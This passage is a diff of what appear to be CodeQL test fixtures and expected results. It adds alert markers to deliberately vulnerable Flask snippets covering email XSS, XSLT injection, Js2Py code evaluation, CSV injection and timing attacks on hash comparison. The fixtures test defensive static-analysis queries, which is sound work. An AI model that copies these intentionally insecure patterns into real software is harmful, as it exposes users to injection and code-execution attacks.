django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | a user-provided value | -| flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | -| smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.qlref b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.qlref index fcc132dd66c5..c141aa6746b3 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-079/EmailXss.ql +query: experimental/Security/CWE-079/EmailXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/django_mail.py b/python/ql/test/experimental/query-tests/Security/CWE-079/django_mail.py index 178e8decc798..fb42c22f02ed 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/django_mail.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/django_mail.py @@ -11,7 +11,7 @@ def django_response(request): https://github.com/django/django/blob/ca9872905559026af82000e46cde6f7dedc897b6/django/core/mail/__init__.py#L64 """ send_mail("Subject", "plain-text body", "from@example.com", - ["to@example.com"], html_message=django.http.request.GET.get("html")) + ["to@example.com"], html_message=django.http.request.GET.get("html")) # $ Alert def django_response(request): @@ -20,6 +20,6 @@ def django_response(request): https://github.com/django/django/blob/ca9872905559026af82000e46cde6f7dedc897b6/django/core/mail/__init__.py#L90-L121 """ mail_admins("Subject", "plain-text body", - html_message=django.http.request.GET.get("html")) + html_message=django.http.request.GET.get("html")) # $ Alert mail_managers("Subject", "plain-text body", - html_message=django.http.request.GET.get("html")) + html_message=django.http.request.GET.get("html")) # $ Alert diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/flask_mail.py b/python/ql/test/experimental/query-tests/Security/CWE-079/flask_mail.py index e8bdcc93634c..6978ad741f6a 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/flask_mail.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/flask_mail.py @@ -1,4 +1,4 @@ -from flask import request, Flask +from flask import request, Flask # $ Source from flask_mail import Mail, Message app = Flask(__name__) @@ -10,12 +10,12 @@ def send(): sender="from@example.com", recipients=["to@example.com"], body="plain-text body", - html=request.args["html"]) + html=request.args["html"]) # $ Alert # The message can contain a body and/or HTML: msg.body = "plain-text body" # The email's HTML can be set via msg.html or as an initialize argument when creating a Message object. - msg.html = request.args["html"] + msg.html = request.args["html"] # $ Alert mail.send(msg) @@ -28,5 +28,5 @@ def connect(): msg = Message(subject="Subject", sender="from@example.com", recipients=["to@example.com"], - html=request.args["html"]) + html=request.args["html"]) # $ Alert conn.send(msg) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_mail.py b/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_mail.py index e10e8a030a81..4d89056f3fed 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_mail.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_mail.py @@ -1,4 +1,4 @@ -from flask import request, Flask +from flask import request, Flask # $ Source from sendgrid import SendGridAPIClient from sendgrid.helpers.mail import Mail, Email, To, Content, MimeType, HtmlContent @@ -11,7 +11,7 @@ def send(): from_email='from_email@example.com', to_emails='to@example.com', subject='Sending with Twilio SendGrid is Fun', - html_content=request.args["html_content"]) + html_content=request.args["html_content"]) # $ Alert sg = SendGridAPIClient('SENDGRID_API_KEY') sg.send(message) @@ -23,7 +23,7 @@ def send(): from_email='from_email@example.com', to_emails='to@example.com', subject='Sending with Twilio SendGrid is Fun', - html_content=HtmlContent(request.args["html_content"])) + html_content=HtmlContent(request.args["html_content"])) # $ Alert sg = SendGridAPIClient('SENDGRID_API_KEY') sg.send(message) @@ -34,7 +34,7 @@ def send_post(): from_email = Email("test@example.com") to_email = To("test@example.com") subject = "Sending with SendGrid is Fun" - html_content = Content("text/html", request.args["html_content"]) + html_content = Content("text/html", request.args["html_content"]) # $ Alert plain_content = Content("text/plain", request.args["plain_content"]) mail = Mail(from_email, to_email, subject, plain_content, html_content) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_via_mail_send_post_request_body_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_via_mail_send_post_request_body_bad.py index fca641057da6..30a67213b487 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_via_mail_send_post_request_body_bad.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/sendgrid_via_mail_send_post_request_body_bad.py @@ -1,6 +1,6 @@ import sendgrid import os -from flask import request, Flask +from flask import request, Flask # $ Source app = Flask(__name__) @@ -13,7 +13,7 @@ def send(): "content": [ { "type": "text/html", - "value": "{}".format(request.args["html_content"]) + "value": "{}".format(request.args["html_content"]) # $ Alert } ], "from": { @@ -24,7 +24,7 @@ def send(): "mail_settings": { "footer": { "enable": True, - "html": "{}".format(request.args["html_footer"]), + "html": "{}".format(request.args["html_footer"]), # $ Alert "text": "Thanks,/n The SendGrid Team" }, }, @@ -38,7 +38,7 @@ def send(): "tracking_settings": { "subscription_tracking": { "enable": True, - "html": "{}".format(request.args["html_tracking"]), + "html": "{}".format(request.args["html_tracking"]), # $ Alert "substitution_tag": "<%click here%>", "text": "If you would like to unsubscribe and stop receiving these emails <% click here %>." } diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_subparts.py b/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_subparts.py index 209bd889393f..20c8e3466aef 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_subparts.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_subparts.py @@ -1,5 +1,5 @@ # This test checks that the developer doesn't pass a MIMEText instance to a MIMEMultipart initializer via the subparts parameter. -from flask import Flask, request +from flask import Flask, request # $ Source import json import smtplib import ssl @@ -21,7 +21,7 @@ def email_person(): # Turn these into plain/html MIMEText objects part1 = MIMEText(text, "plain") - part2 = MIMEText(html, "html") + part2 = MIMEText(html, "html") # $ Alert message = MIMEMultipart(_subparts=(part1, part2)) message["Subject"] = "multipart test" diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_via_attach.py b/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_via_attach.py index 48a228b0bc6e..d50ab028087f 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_via_attach.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/smtplib_bad_via_attach.py @@ -1,5 +1,5 @@ # This test checks that the developer doesn't pass a MIMEText instance to a MIMEMultipart message. -from flask import Flask, request +from flask import Flask, request # $ Source import json import smtplib, ssl from email.mime.text import MIMEText @@ -24,7 +24,7 @@ def email_person(): # Turn these into plain/html MIMEText objects part1 = MIMEText(text, "plain") - part2 = MIMEText(html, "html") + part2 = MIMEText(html, "html") # $ Alert # Add HTML/plain-text parts to MIMEMultipart message # The email client will try to render the last part first diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected index 8d960a22dfde..28c85388a97f 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected @@ -1,3 +1,10 @@ +#select +| xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | edges | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:3:26:3:32 | ControlFlowNode for request | provenance | | | xslt.py:3:26:3:32 | ControlFlowNode for request | xslt.py:10:17:10:23 | ControlFlowNode for request | provenance | | @@ -122,10 +129,3 @@ nodes | xsltInjection.py:46:38:46:48 | ControlFlowNode for xsltStrings [List element] | semmle.label | ControlFlowNode for xsltStrings [List element] | | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | semmle.label | ControlFlowNode for xslt_root | subpaths -#select -| xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.qlref b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.qlref index 4d432d461cab..5bde608133c6 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-091/XsltInjection.ql +query: experimental/Security/CWE-091/XsltInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xslt.py b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xslt.py index 1655916c7e06..6464d35811bb 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xslt.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xslt.py @@ -1,6 +1,6 @@ from lxml import etree from io import StringIO -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @@ -11,4 +11,4 @@ def bad(): xslt_root = etree.XML(xsltQuery) f = StringIO('') tree = etree.parse(f) - result_tree = tree.xslt(xslt_root) # Not OK + result_tree = tree.xslt(xslt_root) # Not OK # $ Alert diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xsltInjection.py b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xsltInjection.py index ddab954bbff8..9f8a25f2e616 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xsltInjection.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/xsltInjection.py @@ -1,6 +1,6 @@ from lxml import etree from io import StringIO -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @@ -9,7 +9,7 @@ def a(): xsltQuery = request.args.get('xml', '') xslt_root = etree.XML(xsltQuery) - transform = etree.XSLT(xslt_root) # Not OK + transform = etree.XSLT(xslt_root) # Not OK # $ Alert @app.route("/xslt2") @@ -18,7 +18,7 @@ def b(): xslt_root = etree.XML(xsltQuery) f = StringIO('') tree = etree.parse(f) - result_tree = tree.xslt(xslt_root) # Not OK + result_tree = tree.xslt(xslt_root) # Not OK # $ Alert @app.route("/xslt3") @@ -28,7 +28,7 @@ def c(): f = StringIO('') tree = etree.parse(f) - result = tree.xslt(xslt_root, a="'A'") # Not OK + result = tree.xslt(xslt_root, a="'A'") # Not OK # $ Alert @app.route("/xslt4") def d(): @@ -37,7 +37,7 @@ def d(): f = StringIO('') tree = etree.parse(f) - result = tree.xslt(xslt_root, a="'A'") # Not OK + result = tree.xslt(xslt_root, a="'A'") # Not OK # $ Alert @app.route("/xslt5") def e(): @@ -47,7 +47,7 @@ def e(): f = StringIO('') tree = etree.parse(f) - result = tree.xslt(xslt_root, a="'A'") # Not OK + result = tree.xslt(xslt_root, a="'A'") # Not OK # $ Alert @app.route("/xslt6") diff --git a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected index 7798cdda143c..3fa27edd5211 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected @@ -1,3 +1,5 @@ +#select +| Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | This input to Js2Py depends on a $@. | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | user-provided value | edges | Js2PyTest.py:9:5:9:6 | ControlFlowNode for jk | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | provenance | | | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:9:5:9:6 | ControlFlowNode for jk | provenance | AdditionalTaintStep | @@ -6,5 +8,3 @@ nodes | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | semmle.label | ControlFlowNode for Fstring | subpaths -#select -| Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | This input to Js2Py depends on a $@. | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.qlref b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.qlref index 457bfe2aacca..b88e9d7f392b 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-094/Js2Py.ql +query: experimental/Security/CWE-094/Js2Py.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2PyTest.py b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2PyTest.py index f7aae16a9eed..d62cabef965c 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2PyTest.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2PyTest.py @@ -6,5 +6,5 @@ @bp.route("/bad") def bad(): - jk = flask.request.form["jk"] - jk = eval_js(f"{jk} f()") \ No newline at end of file + jk = flask.request.form["jk"] # $ Source + jk = eval_js(f"{jk} f()") # $ Alert \ No newline at end of file diff --git a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected index 5152f7353f25..aa90dfaeea0d 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected @@ -1,3 +1,7 @@ +#select +| csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | +| csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | +| csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | edges | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:9:19:9:25 | ControlFlowNode for request | provenance | | | csv_bad.py:9:19:9:25 | ControlFlowNode for request | csv_bad.py:16:16:16:22 | ControlFlowNode for request | provenance | | @@ -26,7 +30,3 @@ nodes | csv_bad.py:24:16:24:38 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | semmle.label | ControlFlowNode for csv_data | subpaths -#select -| csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | -| csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | -| csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.qlref b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.qlref index d9cd7e9ca51c..6fe779d1b362 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-1236/CsvInjection.ql \ No newline at end of file +query: experimental/Security/CWE-1236/CsvInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-1236/csv_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-1236/csv_bad.py index 6e204d1f3c54..91ce60b928b0 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-1236/csv_bad.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-1236/csv_bad.py @@ -6,7 +6,7 @@ import copy import csv from flask import Flask -from flask import request +from flask import request # $ Source from typing import List app = Flask(__name__) @@ -15,14 +15,14 @@ def bad1(): csv_data = request.args.get('csv') csvWriter = csv.writer(open("test.csv", "wt")) - csvWriter.writerow(csv_data) # bad - csvWriter.writerows(csv_data) # bad + csvWriter.writerow(csv_data) # bad # $ Alert + csvWriter.writerows(csv_data) # bad # $ Alert return "bad1" @app.route('/bad2') def bad2(): csv_data = request.args.get('csv') - csvWriter = csv.DictWriter(f, fieldnames=csv_data) # bad + csvWriter = csv.DictWriter(f, fieldnames=csv_data) # bad # $ Alert csvWriter.writeheader() return "bad2" diff --git a/python/ql/test/experimental/query-tests/Security/CWE-176/UnicodeBypassValidation.qlref b/python/ql/test/experimental/query-tests/Security/CWE-176/UnicodeBypassValidation.qlref index ee372b368404..710cbf1f46a5 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-176/UnicodeBypassValidation.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-176/UnicodeBypassValidation.qlref @@ -1 +1 @@ -experimental/Security/CWE-176/UnicodeBypassValidation.ql +query: experimental/Security/CWE-176/UnicodeBypassValidation.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected index 1577182b2dcd..bd32259294e0 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected @@ -1,3 +1,6 @@ +#select +| TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | signature message | +| TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | MAC message | edges | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | provenance | | | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | provenance | | @@ -9,6 +12,3 @@ nodes | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | semmle.label | ControlFlowNode for sign() | subpaths -#select -| TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | signature message | -| TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | MAC message | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.qlref b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.qlref index 73a8e6960ef8..5ac00932072c 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.ql +query: experimental/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected index 0b7b2de8ddb9..0d3ebb1cf116 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected 